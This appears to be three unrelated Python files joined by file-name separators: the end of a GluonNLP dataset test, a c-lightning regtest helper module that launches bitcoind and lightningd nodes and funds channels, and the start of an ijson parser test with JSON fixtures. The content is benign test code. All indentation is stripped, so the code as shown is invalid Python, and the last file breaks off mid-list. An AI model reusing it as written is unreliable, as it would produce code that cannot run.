dataset = cls(segment=segment, root=os.path.join(
'tests', 'externaldata', 'superglue', name))
else:
dataset = cls(root=os.path.join('tests', 'externaldata', 'superglue', name))
assert len(dataset) == length, len(dataset)
if fields:
for i, x in enumerate(dataset):
assert len(x) == fields, x
@pytest.mark.serial
@pytest.mark.remote_required
def test_parallel_load_pretrained_vocab():
def fn(name):
root = 'test_parallel_load_pretrained_vocab'
_ = nlp.data.utils._load_pretrained_vocab(name, root=root)
threads = []
name = 'openwebtext_book_corpus_wiki_en_uncased'
for _ in range(10):
x = threading.Thread(target=fn, args=(name,))
threads.append(x)
for t in threads:
t.start()
for t in threads:
t.join()
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from lightning import LightningRpc
import json
import logging
import lzma
import os
import random
import re
import shutil
import sqlite3
import string
import subprocess
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
with open('config.vars') as configfile:
config = dict([(line.rstrip().split('=', 1)) for line in configfile])
DEVELOPER = os.getenv("DEVELOPER", config['DEVELOPER']) == "1"
EXPERIMENTAL_FEATURES = os.getenv("EXPERIMENTAL_FEATURES", config['EXPERIMENTAL_FEATURES']) == "1"
TIMEOUT = int(os.getenv("TIMEOUT", "60"))
VALGRIND = os.getenv("VALGRIND", config['VALGRIND']) == "1"
SLOW_MACHINE = os.getenv("SLOW_MACHINE", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[regtest]\n")
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
if self.proc.returncode:
raise ValueError("Process '{}' did not cleanly shutdown: return code {}".format(self.proc.pid, rc))
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
btc_conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(btc_conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=btc_conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
return proxy
def generate_block(self, numblocks=1):
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd/lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': 'regtest',
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-broadcast-interval'] = 1000
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self):
self.rpcproxy.start()
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False, may_reconnect=False):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {}'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query, use_copy=True):
orig = os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3")
if use_copy:
copy = os.path.join(self.daemon.lightning_dir, "lightningd-copy.sqlite3")
shutil.copyfile(orig, copy)
db = sqlite3.connect(copy)
else:
db = sqlite3.connect(orig)
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
rows = c.fetchall()
result = []
for row in rows:
result.append(dict(zip(row.keys(), row)))
db.commit()
c.close()
db.close()
return result
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def start(self):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
ex = re.compile(r'lightning_{}.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels()['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'may_reconnect',
'random_hsm',
'log_all_io',
'feerates',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, disconnect=None, options=None, may_fail=False,
may_reconnect=False, random_hsm=False,
feerates=(15000, 7500, 3750), start=True, log_all_io=False,
dbfile=None, node_id=None):
if not node_id:
node_id = self.get_node_id()
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
socket_path = os.path.join(lightning_dir, "lightning-rpc").format(node_id)
daemon = LightningD(
lightning_dir, bitcoindproxy=self.bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
daemon.disconnect_file = os.path.join(lightning_dir, "dev_disconnect")
with open(daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
daemon.opts["dev-disconnect"] = "dev_disconnect"
if log_all_io:
assert DEVELOPER
daemon.env["LIGHTNINGD_DEV_LOG_IO"] = "1"
daemon.opts["log-level"] = "io"
if DEVELOPER:
daemon.opts["dev-fail-on-subdaemon-fail"] = None
daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
daemon.opts["dev-no-reconnect"] = None
if options is not None:
daemon.opts.update(options)
rpc = LightningRpc(socket_path, self.executor)
node = LightningNode(daemon, rpc, self.bitcoind, self.executor, may_fail=may_fail,
may_reconnect=may_reconnect)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if VALGRIND:
node.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(node.daemon.lightning_dir)
]
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, 'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start()
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log('openingd-{} chan #[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
raise Exception("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail
|
test_base.py
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
import collections
import ctypes
import unittest
from decimal import Decimal
import threading
import ijson
from ijson import common, compat
from ijson.compat import b2s, IS_PY2
import warnings
JSON = b'''
{
"docs": [
{
"null": null,
"boolean": false,
"true": true,
"integer": 0,
"double": 0.5,
"exponent": 1.0e+2,
"long": 10000000000,
"string": "\\u0441\\u0442\\u0440\\u043e\\u043a\\u0430 - \xd1\x82\xd0\xb5\xd1\x81\xd1\x82",
"\xc3\xb1and\xc3\xba": null
},
{
"meta": [[1], {}]
},
{
"meta": {"key": "value"}
},
{
"meta": null
},
{
"meta": []
}
]
}
'''
JSON_OBJECT = {
"docs": [
{
"null": None,
"boolean": False,
"true": True,
"integer": 0,
"double": Decimal("0.5"),
"exponent": 1e+2,
"long": 10000000000,
"string": "строка - тест",
"ñandú": None
},
{
"meta": [[1], {}]
},
{
"meta": {
"key": "value"
}
},
{
"meta": None
},
{
"meta": []
}
]
}
JSON_PARSE_EVENTS = [
('', 'start_map', None),
('', 'map_key', 'docs'),
('docs', 'start_array', None),
('docs.item', 'start_map', None),
('docs.item', 'map_key', 'null'),
('docs.item.null', 'null', None),
('docs.item', 'map_key', 'boolean'),
('docs.item.boolean', 'boolean', False),
('docs.item', 'map_key', 'true'),
('docs.item.true', 'boolean', True),
('docs.item', 'map_key', 'integer'),
('docs.item.integer', 'number', 0),
('docs.item', 'map_key', 'double'),
('docs.item.double', 'number', Decimal('0.5')),
('docs.item', 'map_key', 'exponent'),
('docs.item.exponent', 'number', Decimal('1.0E+2')),
('docs.item', 'map_key', 'long'),
('docs.item.long', 'number', 10000000000),
('docs.item', 'map_key', 'string'),
('docs.item.string', 'string', 'строка - тест'),
('docs.item', 'map_key', 'ñandú'),
('docs.item.ñandú', 'null', None),
('docs.item', 'end_map', None),
('docs.item', 'start_map', None),
('docs.item', 'map_key', 'meta'),
('docs.item.meta', 'start_array', None),
('docs.item.meta.item', 'start_array', None),
('docs.item.meta.item.item', 'number', 1),
('docs.item.meta.item', 'end_array', None),
('docs.item.meta.item', 'start_map', None),
('docs.item.meta.item', 'end_map', None),
('docs.item.meta', 'end_array', None),
('docs.item', 'end_map', None),
('docs.item', 'start_map', None),
('docs.item', 'map_key', 'meta'),
('docs.item.meta', 'start_map', None),
('docs.item.meta', 'map_key', 'key'),
('docs.item.meta.key', 'string', 'value'),
('docs.item.meta', 'end_map', None),
('docs.item', 'end_map', None),
('docs.item', 'start_map', None),
('docs.item', 'map_key', 'meta'),
('docs.item.meta', 'null', None),
('docs.item', 'end_map', None),
('docs.item', 'start_map', None),
('docs.item', 'map_key', 'meta'),
('docs.item.meta', 'start_array', None),
('docs.item.meta', 'end_array', None),
('docs.item', 'end_map', None),
('docs', 'end_array', None),
('', 'end_map', None)
]
JSON_KVITEMS = [
("null", None),
("boolean", False),
("true", True),
("integer", 0),
("double", Decimal("0.5")),
("exponent", 1e+2),
("long", 10000000000),
("string", "строка - тест"),
("ñandú", None),
("meta", [[1], {}]),
("meta", {"key": "value"}),
("meta", None),
("meta", [])
]
JSON_KVITEMS_META = [
('key', 'value')
]
JSON_EVENTS = [
('start_map', None),
('map_key', 'docs'),
('start_array', None),
('start_map', None),
('map_key', 'null'),
('null', None),
('map_key', 'boolean'),
('boolean', False),
('map_key', 'true'),
('boolean', True),
('map_key', 'integer'),
('number', 0),
('map_key', 'double'),
('number', Decimal('0.5')),
('map_key', 'exponent'),
('number', 100),
('map_key', 'long'),
('number', 10000000000),
('map_key', 'string'),
('string', 'строка - тест'),
('map_key', 'ñandú'),
('null', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('start_array', None),
('start_array', None),
('number', 1),
('end_array', None),
('start_map', None),
('end_map', None),
('end_array', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('start_map', None),
('map_key', 'key'),
('string', 'value'),
('end_map', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('null', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('start_array', None),
('end_array', None),
('end_map', None),
('end_array', None),
('end_map', None),
]
# Like JSON, but with an additional top-level array structure
ARRAY_JSON = b'[' + JSON + b']'
ARRAY_JSON_EVENTS = (
[('start_array', None)] +
JSON_EVENTS +
[('end_array', None)]
)
ARRAY_JSON_PARSE_EVENTS = (
[('', 'start_array', None)] +
[('.'.join(filter(None, ('item', p))), t, e) for p, t, e in JSON_PARSE_EVENTS] +
[('', 'end_array', None)]
)
ARRAY_JSON_OBJECT = [JSON_OBJECT]
SCALAR_JSON = b'0'
INVALID_JSONS = [
b'["key", "value",]', # trailing comma
b'["key" "value"]', # no comma
b'{"key": "value",}', # trailing comma
b'{"key": "value" "key"}', # no comma
b'{"key" "value"}', # no colon
b'invalid', # unknown lexeme
b'[1, 2] dangling junk', # dangling junk
b'}', # no corresponding opening token
b']', # no corresponding opening token
b'"\xa8"' # invalid UTF-8 byte sequence
]
YAJL1_PASSING_INVALID = INVALID_JSONS[6]
INCOMPLETE_JSONS = [
b'',
b'"test',
b'[',
b'[1',
b'[1,',
b'{',
b'{"key"',
b'{"key":',
b'{"key": "value"',
b'{"key": "value",',
]
INCOMPLETE_JSON_TOKENS = [
b'n',
b'nu',
